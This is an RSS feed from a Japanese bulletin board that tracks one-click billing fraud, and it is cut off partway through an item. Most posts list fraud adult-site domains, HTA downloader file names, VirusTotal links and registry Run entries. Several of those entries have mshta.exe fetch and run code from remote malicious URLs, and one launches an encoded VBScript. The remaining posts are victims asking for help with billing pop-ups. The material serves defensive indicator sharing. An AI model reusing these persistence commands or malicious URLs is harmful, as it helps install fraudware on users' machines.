<?xml version="1.0" encoding="Shift_JIS" ?>
<rdf:RDF
  xmlns="http://purl.org/rss/1.0/"
  xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
  xmlns:dc="http://purl.org/dc/elements/1.1/"
  xml:lang="ja">
 <channel rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yyrss.cgi">
  <title>ワンクリ詐欺掲示板</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>RSS for ワンクリ詐欺掲示板</description>
  <items>
   <rdf:Seq>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
    <rdf:li rdf:resource="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi"/>
   </rdf:Seq>
  </items>
 </channel>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>アダルトサイト</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://yb6.elevenuse.info/" target="_blank">http://yb6.elevenuse.info/</a> <a href="http://fad.elevenuse.info/" target="_blank">http://fad.elevenuse.info/</a> <a href="http://eau.elevenuse.info/" target="_blank">http://eau.elevenuse.info/</a> <a href="http://" target="_blank">http://</a>*.elevenuse.info/  File name「MediaFiles.hta」 <a href="http://virusscan.jotti.org/en/scanresult/d34b6249a92da3eb9255d9d89425f42431c9d94f" target="_blank">http://virusscan.jotti.org/en/scanresult/d34b6249a92da3eb9255d9d89425f42431c9d94f</a>  C:\Documents and Settings\Cerberus\Application Data\Lunascape\vvinMgr.exe C:\WINDOWS\system32\mshta.exe O4 - HKCU\..\Run: [HiIisionjBoes] &quot;C:\Documents and Settings\Cerberus\Application Data\Macromedia\jBoes&quot; O4 - HKCU\..\Run: [scorpik40979_447955105] &quot;C:\WINDOWS\system32\mshta&quot; <a href="http://8b90.elevenuse.info/ptlbvqt/NRJxcZTOLpqmCQZYglwReQ.htm" target="_blank">http://8b90.elevenuse.info/ptlbvqt/NRJxcZTOLpqmCQZYglwReQ.htm</a> 以下略 ------------------------------------------------------- <a href="http://ayo.xlayer.info/" target="_blank">http://ayo.xlayer.info/</a> <a href="http://bnb.xlayer.info/" target="_blank">http://bnb.xlayer.info/</a> <a href="http://" target="_blank">http://</a>*.xlayer.info/  File name「FlvPlayCheck.hta」 <a href="https://www.virustotal.com/file/71fa93e71a807971aa8ced17e151629053ced5a2fc25272e6304528edd414dde/analysis/" target="_blank">https://www.virustotal.com/file/71fa93e71a807971aa8ced17e151629053ced5a2fc25272e6304528edd414dde/analysis/</a>   C:\Documents and Settings\Cerberus\Application Data\Macromedia\TosMsgAgt.exe  C:\WINDOWS\system32\mshta.exe O4 - HKCU\..\Run: [CmlModel Prolok] &quot;C:\Documents and Settings\Cerberus\Application Data\Lunascape\Prolok&quot; O4 - HKCU\..\Run: [scorpik40979_055682811] &quot;C:\WINDOWS\system32\mshta&quot; <a href="http://c03a.xlayer.info/dh/7UIsPjh34JRh2C6xljEhEQ.htm" target="_blank">http://c03a.xlayer.info/dh/7UIsPjh34JRh2C6xljEhEQ.htm</a>  以下略 ------------------------------------------------------ <a href="http://wtk.livedot.org/" target="_blank">http://wtk.livedot.org/</a> <a href="http://m14.livedot.org/" target="_blank">http://m14.livedot.org/</a> <a href="http://" target="_blank">http://</a>*.livedot.org/  File name「QuickMovies.hta」  <a href="https://www.virustotal.com/file/9262384dd69fb1d54ac32d4448e543a6e3a9ff591e61e49083357497aca8e975/analysis/1335956870/" target="_blank">https://www.virustotal.com/file/9262384dd69fb1d54ac32d4448e543a6e3a9ff591e61e49083357497aca8e975/analysis/1335956870/</a>  C:\Documents and Settings\Cerberus\Application Data\Macromedia\vvinMgr.exe C:\WINDOWS\system32\mshta.exe O4 - HKCU\..\Run: [UxWORKS pocketKiFi] &quot;C:\Documents and Settings\Cerberus\Application Data\Identities\pocketKiFi&quot; O4 - HKCU\..\Run: [scorpik40979_364856909] &quot;C:\WINDOWS\system32\mshta&quot; <a href="http://811a.livedot.org/sfkx3k9/N0B098A9RHZ59kMyNJiKbQ.htm" target="_blank">http://811a.livedot.org/sfkx3k9/N0B098A9RHZ59kMyNJiKbQ.htm</a> 以下略 ----------------------------------------------------- <a href="http://aha.zerolabel.info/" target="_blank">http://aha.zerolabel.info/</a> <a href="http://d68.zerolabel.info/" target="_blank">http://d68.zerolabel.info/</a> <a href="http://lmy.zerolabel.info/" target="_blank">http://lmy.zerolabel.info/</a> <a href="http://kf6.zerolabel.info/" target="_blank">http://kf6.zerolabel.info/</a> <a href="http://g6j.zerolabel.info/" target="_blank">http://g6j.zerolabel.info/</a> <a href="http://" target="_blank">http://</a>*.zerolabel.info/   File name「MediaFiles.hta」 <a href="https://www.virustotal.com/file/a8447d3b5ae22d77294932cdd33c4b0ef73eaef1b1718789c2e19e7791d4c3d8/analysis/1336134293/" target="_blank">https://www.virustotal.com/file/a8447d3b5ae22d77294932cdd33c4b0ef73eaef1b1718789c2e19e7791d4c3d8/analysis/1336134293/</a>  C:\Documents and Settings\Cerberus\Application Data\Adobe\wmMsgSvr.exe C:\WINDOWS\system32\mshta.exe O4 - HKCU\..\Run: [scorpik40979_364856909] &quot;C:\WINDOWS\system32\mshta&quot; <a href="http://6243.livedot.org/ps4fplzb/adsgJ3DNJBHBU2lhoC0noQ.htm" target="_blank">http://6243.livedot.org/ps4fplzb/adsgJ3DNJBHBU2lhoC0noQ.htm</a> O4 - HKCU\..\Run: [iNink(RedTook)] &quot;C:\Documents and Settings\Cerberus\Application Data\Macromedia\Cakellia&quot;  The link place of &quot;Cakellia&quot;  &quot;C:\Documents and Settings\Cerberus\Application Data\Adobe\wmMsgSvr.exe&quot; //B //E:VBScript.Encode &quot;C:\Documents and Settings\Cerberus\Application Data\Adobe\Agate910hLNT.dic&quot;    Startup on Registory  HKCU:Run iNink(RedTook) &quot;C:\Documents and Settings\Cerberus\Application Data\Macromedia\Cakellia&quot; HKCU:Run scorpik40979_055682811 &quot;C:\WINDOWS\system32\mshta&quot; <a href="http://00dc.xlayer.info/dnvr/Qmn45W-E5BkJW1WV5VhLEQ.htm" target="_blank">http://00dc.xlayer.info/dnvr/Qmn45W-E5BkJW1WV5VhLEQ.htm</a> HKCU:Run scorpik40979_364856909 &quot;C:\WINDOWS\system32\mshta&quot; <a href="http://6243.livedot.org/ps4fplzb/adsgJ3DNJBHBU2lhoC0noQ.htm" target="_blank">http://6243.livedot.org/ps4fplzb/adsgJ3DNJBHBU2lhoC0noQ.htm</a> ------------------------------------------------------ <a href="http://a7i.wordunit.info/" target="_blank">http://a7i.wordunit.info/</a> <a href="http://" target="_blank">http://</a>*.wordunit.info/   File name「WinMediaPlay.hta」 <a href="https://www.virustotal.com/file/65de9c3174e55fbe640f55d78cf9b4b5a996d16470985bc7a9833bbee22f0ed1/analysis/1336137469/" target="_blank">https://www.virustotal.com/file/65de9c3174e55fbe640f55d78cf9b4b5a996d16470985bc7a9833bbee22f0ed1/analysis/1336137469/</a>   C:\Documents and Settings\Cerberus\Application Data\Macromedia\vvinMgr.exe C:\WINDOWS\system32\mshta.exe C:\WINDOWS\system32\mshta.exe  O4 - HKCU\..\Run: [SmartMeddapockeqWiFi] &quot;C:\Documents and Settings\Cerberus\Application Data\Identities\pockeqWiFi&quot; O4 - HKCU\..\Run: [scorpik40979_447955105] &quot;C:\WINDOWS\system32\mshta&quot; <a href="http://6f3b.elevenuse.info/d89h/OYOGFcsQ7M8QTfdfviGTDg.htm" target="_blank">http://6f3b.elevenuse.info/d89h/OYOGFcsQ7M8QTfdfviGTDg.htm</a> O4 - HKCU\..\Run: [scorpik40979_249753408] &quot;C:\WINDOWS\system32\mshta&quot; <a href="http://d329.wordunit.info/sl8c6/a680i2MgSLE~78awyBSGvw.htm" target="_blank">http://d329.wordunit.info/sl8c6/a680i2MgSLE~78awyBSGvw.htm</a>   The link place of &quot;pockeqWiFi&quot;  &quot;C:\Documents and Settings\Cerberus\Application Data\Macromedia\vvinMgr.exe&quot; //B //E:VBScript.Encode &quot;C:\Documents and Settings\Cerberus\Application Data\Lunascape\Malachite511GpL&quot;    Startup on Registory HKCU:Run scorpik40979_249753408 &quot;C:\WINDOWS\system32\mshta&quot; <a href="http://d329.wordunit.info/sl8c6/a680i2MgSLE~78awyBSGvw.htm" target="_blank">http://d329.wordunit.info/sl8c6/a680i2MgSLE~78awyBSGvw.htm</a> HKCU:Run scorpik40979_447955105 &quot;C:\WINDOWS\system32\mshta&quot; <a href="http://6f3b.elevenuse.info/d89h/OYOGFcsQ7M8QTfdfviGTDg.htm" target="_blank">http://6f3b.elevenuse.info/d89h/OYOGFcsQ7M8QTfdfviGTDg.htm</a> HKCU:Run SmartMeddapockeqWiFi &quot;C:\Documents and Settings\Cerberus\Application Data\Identities\pockeqWiFi&quot;  --------------------------------------------------  <a href="http://a7i.wordunit.info/" target="_blank">http://a7i.wordunit.info/</a> <a href="http://tfl.wordunit.info/" target="_blank">http://tfl.wordunit.info/</a> <a href="http://" target="_blank">http://</a>*.wordunit.info/  File name「WinMediaPlay.hta」 Kaspersky Trojan-Downloader.HTA.Agent.ct 20120507  <a href="https://www.virustotal.com/file/1ad3733b79bca0bf602614c975d26b804a7bbfbeb9c04e77363e05484d16b2f0/analysis/1336386313/" target="_blank">https://www.virustotal.com/file/1ad3733b79bca0bf602614c975d26b804a7bbfbeb9c04e77363e05484d16b2f0/analysis/1336386313/</a>  C:\Documents and Settings\Cerberus\Application Data\Adobe\wmMsgSvr.exe C:\WINDOWS\system32\mshta.exe O4 - HKCU\..\Run: [PetrCast(PlqyerPack)] &quot;C:\Documents and Settings\Cerberus\Application Data\Adobe\PlqyerPack&quot; O4 - HKCU\..\Run: [scorpik40979_249753408] &quot;C:\WINDOWS\system32\mshta&quot; <a href="http://e6a7.wordunit.info/pau/lXiYXLi6dgmsdKpPpgiKVw.htm" target="_blank">http://e6a7.wordunit.info/pau/lXiYXLi6dgmsdKpPpgiKVw.htm</a> 以下略 </description>
  <dc:date>2012-05-02T23:22+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>ADULT COLLECTION </title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://www.roundabout-movie.in/" target="_blank">http://www.roundabout-movie.in/</a>  File name 「5b9e.hta」 <a href="https://www.virustotal.com/file/879107f2ff14cc77f311b4922f97ceb203b2ddcc69e64f71aa21fab6f66de855/analysis/1333882428/" target="_blank">https://www.virustotal.com/file/879107f2ff14cc77f311b4922f97ceb203b2ddcc69e64f71aa21fab6f66de855/analysis/1333882428/</a>  C:\Windows\system32\mshta.exe  O4 - HKCU\..\Run: [www.adult-collection09.net] mshta <a href="http://www.roundabout-movie.in/regist2.php" target="_blank">http://www.roundabout-movie.in/regist2.php</a>  ---------------------------------------------------------  <a href="http://www.amber-movie.info/" target="_blank">http://www.amber-movie.info/</a>  File name 「4f58.hta」   <a href="https://www.virustotal.com/file/c234db315f579a4bd50d078bf215e06baf47e0008b7fb18d9eb8c7aceb613810/analysis/1333971109/" target="_blank">https://www.virustotal.com/file/c234db315f579a4bd50d078bf215e06baf47e0008b7fb18d9eb8c7aceb613810/analysis/1333971109/</a>   C:\Windows\system32\mshta.exe  O4 - HKCU\..\Run: [www.adult-collection09.net] mshta <a href="http://www.amber-movie.info/regist2.php" target="_blank">http://www.amber-movie.info/regist2.php</a> ---------------------------------------------------------  <a href="http://www.beetroot-movie.info/" target="_blank">http://www.beetroot-movie.info/</a>  File name 「7992.hta」   <a href="https://www.virustotal.com/file/327df6bb57c1874fb78a9435b293953932c77121a0a1fd5183f89e4715272997/analysis/1334006471/" target="_blank">https://www.virustotal.com/file/327df6bb57c1874fb78a9435b293953932c77121a0a1fd5183f89e4715272997/analysis/1334006471/</a>  C:\Windows\system32\mshta.exe  O4 - HKCU\..\Run: [www.adult-collection09.net] mshta <a href="http://www.beetroot-movie.info/regist2.php" target="_blank">http://www.beetroot-movie.info/regist2.php</a>  -------------------------------------------------------- <a href="http://www.gargoyle-movie.org/" target="_blank">http://www.gargoyle-movie.org/</a>  File name 「2bb6.hta」   <a href="https://www.virustotal.com/file/cc0a1c2497fa265b2cbb8211734d629daddc0f5f0b49572452c9a1cdb0de6d2d/analysis/1334048205/" target="_blank">https://www.virustotal.com/file/cc0a1c2497fa265b2cbb8211734d629daddc0f5f0b49572452c9a1cdb0de6d2d/analysis/1334048205/</a>   C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [www.adult-collection09.net] mshta <a href="http://www.gargoyle-movie.org/regist2.php" target="_blank">http://www.gargoyle-movie.org/regist2.php</a> -------------------------------------------------------- <a href="http://www.porridge-movie.net/" target="_blank">http://www.porridge-movie.net/</a>  File name 「53f1.hta」   <a href="https://www.virustotal.com/file/b8174b4d47178b864f1d112b473a34bafe6c34fa3fba0b809237d5fd82436a0c/analysis/1334094006/" target="_blank">https://www.virustotal.com/file/b8174b4d47178b864f1d112b473a34bafe6c34fa3fba0b809237d5fd82436a0c/analysis/1334094006/</a>   C:\Windows\system32\mshta.exe  O4 - HKCU\..\Run: [www.adult-collection09.net] mshta <a href="http://" target="_blank">http://</a> www.porridge-movie.net/regist2.php  --------------------------------------------------------  <a href="http://www.self-conscious.biz/" target="_blank">http://www.self-conscious.biz/</a>  File name 「6961.hta」  <a href="https://www.virustotal.com/file/4167da068cba8acaf72fe78cd30fdfae40783388d36cfd468f307877aa005806/analysis/1334134623/" target="_blank">https://www.virustotal.com/file/4167da068cba8acaf72fe78cd30fdfae40783388d36cfd468f307877aa005806/analysis/1334134623/</a>    C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [www.adult-collection09.net] mshta <a href="http://www.self-conscious.biz/regist2.php" target="_blank">http://www.self-conscious.biz/regist2.php</a>  --------------------------------------------------------- <a href="http://www.shirk-shingle.com/" target="_blank">http://www.shirk-shingle.com/</a>   File name「5a5e.hta」 <a href="https://www.virustotal.com/file/1e9916a7dc21a32352f8418538648541d1f212a747cacac98005ffed6f64b09e/analysis/1334143864/" target="_blank">https://www.virustotal.com/file/1e9916a7dc21a32352f8418538648541d1f212a747cacac98005ffed6f64b09e/analysis/1334143864/</a>   C:\Windows\system32\mshta.exe  O4 - HKCU\..\Run: [www.adult-collection09.net] mshta <a href="http://www.shirk-shingle.com/regist2.php" target="_blank">http://www.shirk-shingle.com/regist2.php</a>    ------------------------------------------------------- <a href="http://www.stand-byy.net/" target="_blank">http://www.stand-byy.net/</a>   File name「6dce.hta」 <a href="https://www.virustotal.com/file/cb268fc60a20c885ed898e0c3bcf92447caf3a20341e541341554685f9b604b5/analysis/" target="_blank">https://www.virustotal.com/file/cb268fc60a20c885ed898e0c3bcf92447caf3a20341e541341554685f9b604b5/analysis/</a>   C:\Windows\system32\mshta.exe  O4 - HKCU\..\Run: [www.adult-collection09.net] mshta <a href="http://www.stand-byy.net/regist2.php" target="_blank">http://www.stand-byy.net/regist2.php</a>  ------------------------------------------------------ <a href="http://www.washing-stand.net/" target="_blank">http://www.washing-stand.net/</a>  File name「7fcc.hta」 <a href="https://www.virustotal.com/file/2f239c2eda2b05ea51d4154a81ede3f59e6d8bf72599f9a23cc7ed86381dfb2a/analysis/1334995268/" target="_blank">https://www.virustotal.com/file/2f239c2eda2b05ea51d4154a81ede3f59e6d8bf72599f9a23cc7ed86381dfb2a/analysis/1334995268/</a>  C:\Windows\system32\mshta.exe  O4 - HKCU\..\Run: [www.adult-collection09.net] mshta <a href="http://www.washing-stand.net/regist2.php" target="_blank">http://www.washing-stand.net/regist2.php</a> ------------------------------------------------------ <a href="http://www.fire-iron.com/" target="_blank">http://www.fire-iron.com/</a>  File name「7fba.hta」 <a href="https://www.virustotal.com/file/da95985250e8eb0b57247d5c308f98e32ef8b36fb5ecbc618d8cd8af546a7822/analysis/1335006955/" target="_blank">https://www.virustotal.com/file/da95985250e8eb0b57247d5c308f98e32ef8b36fb5ecbc618d8cd8af546a7822/analysis/1335006955/</a>  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [www.adult-collection09.net] mshta <a href="http://www.fire-iron.com/regist2.php" target="_blank">http://www.fire-iron.com/regist2.php</a> ----------------------------------------------------- <a href="http://www.kick-myself.net/" target="_blank">http://www.kick-myself.net/</a>   File name「6cea.hta」 <a href="https://www.virustotal.com/file/101be822a99227bc3afd3561426ede82db4e9d1b7cf31c5f969ae86daf3b8116/analysis/1335180654/" target="_blank">https://www.virustotal.com/file/101be822a99227bc3afd3561426ede82db4e9d1b7cf31c5f969ae86daf3b8116/analysis/1335180654/</a>  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [www.adult-collection09.net] mshta <a href="http://www.kick-myself.net/regist2.php" target="_blank">http://www.kick-myself.net/regist2.php</a> ------------------------------------------------------- <a href="http://www.lord-forbid.biz/" target="_blank">http://www.lord-forbid.biz/</a>   File name「75f1.hta」 <a href="https://www.virustotal.com/file/7bf0f5769b53db77d0227e4383b464025076e10f47b53ed4b106ed52301a7fd6/analysis/1335264438/" target="_blank">https://www.virustotal.com/file/7bf0f5769b53db77d0227e4383b464025076e10f47b53ed4b106ed52301a7fd6/analysis/1335264438/</a>  C:\Windows\system32\mshta.exe  O4 - HKCU\..\Run: [www.adult-collection09.net] mshta <a href="http://www.lord-forbid.biz/regist2.php" target="_blank">http://www.lord-forbid.biz/regist2.php</a>  ----------------------------------------------------- <a href="http://www.see-here.net/" target="_blank">http://www.see-here.net/</a>  File name「7d43.hta」 <a href="https://www.virustotal.com/file/041088df95ca8bb772db25fdb6886f75afda4eaf558aae30276416a1caceb836/analysis/1335351833/" target="_blank">https://www.virustotal.com/file/041088df95ca8bb772db25fdb6886f75afda4eaf558aae30276416a1caceb836/analysis/1335351833/</a>  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [www.adult-collection09.net] mshta <a href="http://www.see-here.net/regist2.php" target="_blank">http://www.see-here.net/regist2.php</a> -------------------------------------------------- <a href="http://www.accord-bargain.com/" target="_blank">http://www.accord-bargain.com/</a>   File name「7a82.hta」 <a href="https://www.virustotal.com/file/dce8a6100d31406d5cd61346659215f716d07856f97b650a7876d7bd8839486f/analysis/1335433088/" target="_blank">https://www.virustotal.com/file/dce8a6100d31406d5cd61346659215f716d07856f97b650a7876d7bd8839486f/analysis/1335433088/</a>  C:\Windows\system32\mshta.exe  O4 - HKCU\..\Run: [www.adult-collection09.net] mshta <a href="http://www.accord-bargain.com/regist2.php" target="_blank">http://www.accord-bargain.com/regist2.php</a> ----------------------------------------------------- <a href="http://www.you-know-what.net/" target="_blank">http://www.you-know-what.net/</a>   File name「43a0.hta」 <a href="https://www.virustotal.com/file/6fd529b1e0df81c12248483e6682d86cce9b34a96df2e21063a40f0bf2647ca2/analysis/1335433835/" target="_blank">https://www.virustotal.com/file/6fd529b1e0df81c12248483e6682d86cce9b34a96df2e21063a40f0bf2647ca2/analysis/1335433835/</a>  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [www.adult-collection09.net] mshta <a href="http://www.you-know-what.net/regist2.php" target="_blank">http://www.you-know-what.net/regist2.php</a> ------------------------------------------------------ <a href="http://www.wet-suit.org/" target="_blank">http://www.wet-suit.org/</a>  File name「6602.hta」 <a href="https://www.virustotal.com/file/cbc4381efa3d7c1791f3ec353256b87d49cc33f14fc72eabc4324d104fea5a45/analysis/1335612095/" target="_blank">https://www.virustotal.com/file/cbc4381efa3d7c1791f3ec353256b87d49cc33f14fc72eabc4324d104fea5a45/analysis/1335612095/</a>  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [www.adult-collection09.net] mshta <a href="http://www.wet-suit.org/regist2.php" target="_blank">http://www.wet-suit.org/regist2.php</a> ---------------------------------------------------- <a href="http://www.court-field.com/" target="_blank">http://www.court-field.com/</a>  File name「76a0.hta」 <a href="https://www.virustotal.com/file/ff3fde6fceb7e720b93d8bd54f881426352cc3c338c20ee97a566c9c234e5863/analysis/1335610799/" target="_blank">https://www.virustotal.com/file/ff3fde6fceb7e720b93d8bd54f881426352cc3c338c20ee97a566c9c234e5863/analysis/1335610799/</a>  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [www.adult-collection09.net] mshta <a href="http://www.court-field.com/regist2.php" target="_blank">http://www.court-field.com/regist2.php</a> ------------------------------------------------------- <a href="http://www.lbow-pads.net/" target="_blank">http://www.lbow-pads.net/</a>  File name「56db.hta」 <a href="https://www.virustotal.com/file/22496c9623f9125368d62999a6d288221d874472a6e31d1769b4a7f1e2c8ab09/analysis/1335700820/" target="_blank">https://www.virustotal.com/file/22496c9623f9125368d62999a6d288221d874472a6e31d1769b4a7f1e2c8ab09/analysis/1335700820/</a>  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [www.adult-collection09.net] mshta <a href="http://www.lbow-pads.net/regist2.php" target="_blank">http://www.lbow-pads.net/regist2.php</a> ------------------------------------------------------- <a href="http://www.oxygen-tank.org/" target="_blank">http://www.oxygen-tank.org/</a>  File name「49f7.hta」 <a href="https://www.virustotal.com/file/31c548837a53f361ff9892abda6e3a5116b22f8fb178283932753d0c9cb686e4/analysis/" target="_blank">https://www.virustotal.com/file/31c548837a53f361ff9892abda6e3a5116b22f8fb178283932753d0c9cb686e4/analysis/</a>  C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [www.adult-collection09.net] mshta <a href="http://www.oxygen-tank.org/regist2.php" target="_blank">http://www.oxygen-tank.org/regist2.php</a> ----------------------------------------------------  <a href="http://www.relay-race.org/" target="_blank">http://www.relay-race.org/</a>   <a href="http://www.sea-bathing.net/" target="_blank">http://www.sea-bathing.net/</a>   <a href="http://www.shot-put.info/" target="_blank">http://www.shot-put.info/</a> </description>
  <dc:date>2012-04-08T20:16+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>やばい</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ADULT COLLECTIONに間違えて入会してしまったのですがデスクトップに出たのを消したいのですがどうしたらいいですか </description>
  <dc:date>2012-05-01T22:44+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>アダルト</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>アダルトサイトにつないだら、不正請求のメッセージがデスクトップ上から消えません。どうか消える方法を教えてください。</description>
  <dc:date>2012-04-28T01:37+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>ムービーゴーゴー</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://movie-gogo.com/" target="_blank">http://movie-gogo.com/</a>    File name 「動画を見る94352005.hta」     <a href="https://www.virustotal.com/file/00dab572539cc3060c0ec05a11d6737bccd113be7407a69d2c0ea3bc26c8488d/analysis/1333020623/" target="_blank">https://www.virustotal.com/file/00dab572539cc3060c0ec05a11d6737bccd113be7407a69d2c0ea3bc26c8488d/analysis/1333020623/</a>   C:\Windows\System32\mshta.exe O4 - HKCU\..\Run: [webtecrl] mshta &quot;C:\ProgramData    ecrl\26A64AXF.hta&quot;  以下略 </description>
  <dc:date>2012-03-29T21:01+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>ADULT</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ノーマルワンクリ   <a href="http://www.mandshurica-movies.com/" target="_blank">http://www.mandshurica-movies.com/</a>   ADULT DREAM   <a href="http://www.tebatto-channel.org/" target="_blank">http://www.tebatto-channel.org/</a> </description>
  <dc:date>2012-03-25T21:29+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>ADULT COLLECTION</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://www.tiliquagerrardi-movie.net/" target="_blank">http://www.tiliquagerrardi-movie.net/</a>  File name 「6f67.hta」   <a href="https://www.virustotal.com/file/a8a100cd1d078b5e19bc050f86db22e01449bf43301ef827528d0db7907c1a39/analysis/1332578466/" target="_blank">https://www.virustotal.com/file/a8a100cd1d078b5e19bc050f86db22e01449bf43301ef827528d0db7907c1a39/analysis/1332578466/</a>  C:\Windows\system32\mshta.exe  O4 - HKCU\..\Run: [www.adult-collection09.net] mshta <a href="http://www.tiliquagerrardi-movie.net/regist2.php" target="_blank">http://www.tiliquagerrardi-movie.net/regist2.php</a> 以下略  </description>
  <dc:date>2012-03-24T20:57+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>MOVIE FIRE </title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://www.mv-fire.net/" target="_blank">http://www.mv-fire.net/</a>  File name 「full54944943.hta」  <a href="https://www.virustotal.com/file/87a4c35bab8cf44d94feef99bdd3279393689edcffbd80d63e3e692c0c210170/analysis/1332329323/" target="_blank">https://www.virustotal.com/file/87a4c35bab8cf44d94feef99bdd3279393689edcffbd80d63e3e692c0c210170/analysis/1332329323/</a>  C:\Windows\System32\mshta.exe O4 - HKCU\..\Run: [webutjpc] &quot;C:\ProgramData\utjpc\M1866HVS&quot;  Startup on Registory   HKCU:Run webutjpc &quot;C:\ProgramData\utjpc\M1866HVS&quot;        </description>
  <dc:date>2012-03-21T21:32+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>パソコンの画面の画像を消す</title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>パソコンの画面にアダルトサイトの有害な広告が貼り付いているのでなんとかしてください</description>
  <dc:date>2012-03-23T19:09+09:00</dc:date>
 </item>
 <item rdf:about="http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi">
  <title>アダルトサイト </title>
  <link>http://www.ken-hokuto.com/oneclick/bbs/yybbs.cgi</link>
  <description>ワンクリウェア入り  <a href="http://gtr.fasteasy.biz/" target="_blank">http://gtr.fasteasy.biz/</a> <a href="http://" target="_blank">http://</a>*.fasteasy.biz/    File name 「MoviePlayer.hta」   <a href="https://www.virustotal.com/file/7522488eb83f754647304b127344c0fbc003d1fc200d91ad37aa78be8c7d4481/analysis/1331110356/" target="_blank">https://www.virustotal.com/file/7522488eb83f754647304b127344c0fbc003d1fc200d91ad37aa78be8c7d4481/analysis/1331110356/</a>   C:\Users\Cerberus\AppData\Roaming\Identities\TosMsgAgt.exe C:\Windows\system32\mshta.exe O4 - HKCU\..\Run: [EebLogic opneron] &quot;C:\Users\Cerberus\AppData\Roaming\Macromedia\opneron.lnk&quot; O4 - HKCU\..\Run: [uranvs44879_799921408] &quot;C:\Windows\system32\mshta&quot; <a href="http://8427.effectlayer.biz/q2n/V5HC~Akaz-1MRcvSNaDz8g.htm" target="_blank">http://8427.effectlayer.biz/q2n/V5HC~Akaz-1MRcvSNaDz8g.htm</a>  以下略 ----------------------------------------------------------- <a href="http://6ig.fieldset.info/" target="_blank">http://6ig.fieldset.info/</a> <a href="http://r2h.fieldset.info/" target="_blank">http://r2h.fieldset.info/</a> <a href="http://" target="_blank">http://</a>*.fieldset.info/    File name 「FlvMovie.hta」 <a href="https://www.virustotal.com/file/e1fb5b7c37f0d5a31a48d0271cebd1830e36f019b1d8486e10802740d6df8e8a/analysis/1331205121/" target="_blank">https://www.virustotal.com/file/e1fb5b7c37f0d5a31a48d0271cebd1830e36f019b1d8486e10802740d6df8e8a/analysis/1331205121/</a>    C:\Users\Creberus\AppData\Roaming\Macromedia\wmMsgSvr.exe  